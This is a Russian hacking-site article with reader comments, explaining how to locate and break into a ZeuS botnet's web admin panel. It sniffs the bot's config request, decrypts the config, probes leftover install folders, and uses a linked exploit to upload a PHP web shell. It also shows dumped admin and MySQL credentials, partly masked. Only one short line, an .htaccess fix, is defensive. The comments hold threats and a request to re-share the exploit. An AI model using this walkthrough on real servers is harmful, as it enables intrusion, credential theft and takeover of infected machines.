Контакты

Для связи с нами можно использовать:
irc://irc.chatnet.ru:#gfs
icq://546460
email://cobalt[@]gfs-team.ru

Все материалы предоставлены только с ознакомительной целью
ГлавнаяСтатьиКрэкингВзлом формграбера ZeuS
© St. 09.05.2008

В данной статье мы рассмотрим простейший анализ малварь грабера (бота) ZeuS и дальнейший взлом его админки...

Немного про Zeus - это бот формграбер, довольно многофункциональный, стоит он порядка 3к$, главная его задача это грабинг веб форм, грабинг фтп, т.е. выполняет функции по сбору паролей у юзера и другие различные фичи.

Управление данным ботом производится через Web-админку, которую мы и заюзаем.

Для начала нам понадобится сам бинарник Zeus'a, его довольно просто найти к примеру на сайте www.malwaredomainlist.com, на нём выкладывают линки на раздичные малварь, вирусы, эксплоиты и прочий стафф, и Zeus тому не исключение. Достаточно в поиск ввести ldr.exe - это бинарник Zeus'a, либо cfg.bin - это его конфиг, в котором хранятся нстройки бота в зашифрованном виде. Сам бинарник при открытии первым делом будет качать cfg.bin - это его конфиг, в нём записан путь к админке Zeus'a, но обычно (90% случаев) бинарник с конфигом лежат в одной директории с админкой.

В общем качаем попавшийся бинарник Zeus'a и начинаем анализировать откуда он качает конфиг, делать это через отладчик не желательно, ибо да же малварь анализаторы (некие "песочницы" анализирующие активность вредоносного кода) не могут определить откуда идёт скачка, по этому воспользуемся снифером пакетов Wireshark.

Открываем Wireshark, вкладка Capture -> Interfaces, там выбираем наш сетевой адаптер и жмём Start. После чего в главном окне программы будут отображаться передаваемые пакеты. Так как нам нужны пакеты которые отсылает именно Zeus тогда откроем его (например на виртуальной машине) после чего в логе ищем следующую строчку :


Source           Destination      Protocol       Info
66.175.*.*       211.95.*.*       HTTP           Get /web/cfg.bin  HTTP/1.0

следовательно отсюда видно что получаем конфиг зевса гет запросом, посмотрев в нижнее окно снифера можно найти домен с которого идёт скачка конфига:


Get /web/cfg.bin HTTP/1.0..User-Agent: Mozilla/4.0(comportable); MSIE 6.0;
Windows NT 5.1)..HOST: ddosmanager.***..Ptagma: no-cashe....

следовательно ddosmanager.*** это и есть домен, а конфиг лежит по следующему адресу: ddosmanager.***/web/cfg.bin нам его необходимо скачать и расшифровать, чтобы наверняка узнать адрес админки, для этого используем софтину ZeusDecrypter, скормим ей конфиг и получим следующий текст:


Config version: 1.0.6.2
Loader url: http://ddosmanager.***/web/ldr.exe      //путь до лоадера бота
Server url: http://ddosmanager.***/web/s.php        //путь до скрипта админки
Advanced config 1: http://ftpiframer.***/cfg1.bin   //пыть до дополнительной админке
etc...

отсюда видим что полный путь до скрипта админки http://ddosmanager.***/web/s.php .... следовательно начинаем проверять:
http://ddosmanager.***/web/in.php - ага видим сама админка, запрос логина и пароля можно попробывать их подобрать)))
http://ddosmanager.***/web/.install - проверяем может вдруг случайно не удалили папку с инсталом и мы сможем спалить пароли к бд
http://ddosmanager.***/web/.files - проверяем существует ли папка в которую Zeus копирует сертификаты.
если существует то всё гуд.

В Zeus'e так же есть грабер сертификатов, вебмани ключей, скрины кликов. Всё это добро копируется в диру .files, следовательно можно попытаца отправить в эту диру произвольный PHP скрипт за место сертификата, например тот же веб-шел. Для этого нам понадобицо сплоит который можно слить здесь: http://rapidshare.com/files/113307574/Zeus_Exploit.rar.html далее заливаем сплоит на хост с поддержкой PHP, запускаем и вводим данные по веб админке:


HOST: ddosmanager.***
FOLDER: web/

ну и жмём заветную кнопку на запуск, после чего сплоит выводит нам данные по админке:


q4array(8) { [0]=> string(1) "1" ["id"]=> string(1) "1" [1]=> string(4) "vis*" ["login"]=> string(4) 

"vis*" [2]=> string(6) "fynji*" ["pass"]=> string(6) "fynji*" [3]=> string(10) "4294967295" ["priv"]=> 

string(10) "4294967295" } array(8) { [0]=> string(1) "2" ["id"]=> string(1) "2" [1]=> string(9) 

"elpirato*" ["login"]=> string(9) "elpirato*" [2]=> string(6) "12312*" ["pass"]=> string(6) "12312*" [3]=> 

string(7) "2097135" ["priv"]=> string(7) "2097135" } array(8) { [0]=> string(1) "4" ["id"]=> string(1) "4" 

[1]=> string(7) "Stifle*" ["login"]=> string(7) "Stifle*" [2]=> string(6) "12345*" ["pass"]=> string(6) 

"12345*" [3]=> string(6) "368871" ["priv"]=> string(6) "368871" } MYSQLHOST: localhost MYSQLUSER: 

traff*****_zeus MYSQLPASS:123***

отсюда видим:


1)
vis* - логин
fynji* - пароль
2)
elpirato* - логин
12312* - пароль
3)
Stifle* - логин
12345* - пароль

3 логина и пароля к админке - так как к ней имели доступ 3 пользователя, так же сплоит выдаёт другие данные по БД.

Ну вот и всё в принципе, теперь имея полученные данные можно логинецо в админку, угонять ботов, сливать логи и делать другие действия. Так же через сплоит можно на хост залить шел.

Исправить данный баг довольно просто, нужно запретить выполнение скриптов из этой директори, к примеру простым добавлением строчек в .htaccess:

RemoveType php

<IfModule mod_php4.c>
php_flag engine 0
</IfModule>

<IfModule mod_php5.c>
php_flag engine 0
</IfModule>[/i]

Gratz:

[GFS-Team]
[TGBR]
[CCB]
з.ы. отдельное спасибо за сплоит Semen-Demon ^^




© St. 09.05.2008

e-Commerce Partners Network
Mef написал:

Сотрите нахео пост...
Зеус и ДДОС может делать.Об этом подумайте.
Всех благ.

zip написал:

респект!
http://ddosmanager.***/web/in.php а почему нету ботов? = ))

---------- написал:

Ну вы и уебаны... Пиздец вам. Встречайте

31337 написал:

&gt;&gt;Ну вы и уебаны... Пиздец вам. Встречайте

Лолес, если хочеш поговорить лецом на лицо стучи ко мне в ойсеку 456020.
Посморем кто кому пездец устроит :P
p/s Лапку сталена мы никому в обиду не додим =)

Cobalt написал:

to Mef, ------ and other:

Если "будет приняты меры" против сайта, статья + доп приватная часть попадет на кучу паблик ресурсов. Баги надо исправлять а не "принемать меры". Было бы весело еслиб например авторы кернуха никсов "принемали меры" против секуритилаба за баги

d0xb3at написал:

Для этого нам понадобицо сплоит который можно слить здесь: Zeus_Exploit.rar.html

перезалейте. очень очень надо

Ник:

Текст:
P Br B I Qute



Код: обновить
Последние комментарии
20.09.2017 08:47:03 Avito777jeax написал:
<b>Пополение баланса Авито (Avito) за 50%</b> | <b>Телеграмм @a1garant</b> <b>Здравствуйте,...
Предупреждение
20.09.2017 08:20:25 Avito777jeax написал:
<b>Пополение баланса Авито (Avito) за 50%</b> | <b>Телеграмм @a1garant</b> <b>Мое...
Новая статья
20.09.2017 08:15:19 Avito777jeax написал:
<b>Пополение баланса Авито (Avito) за 50%</b> | <b>Телеграмм @a1garant</b> <b>Приветствую...
Новый релиз
Реклама

Тут должна была быть ваша реклама, но мы потеряли глиняную табличку с ее текстом. SapeId: 665044

Rambler's Top100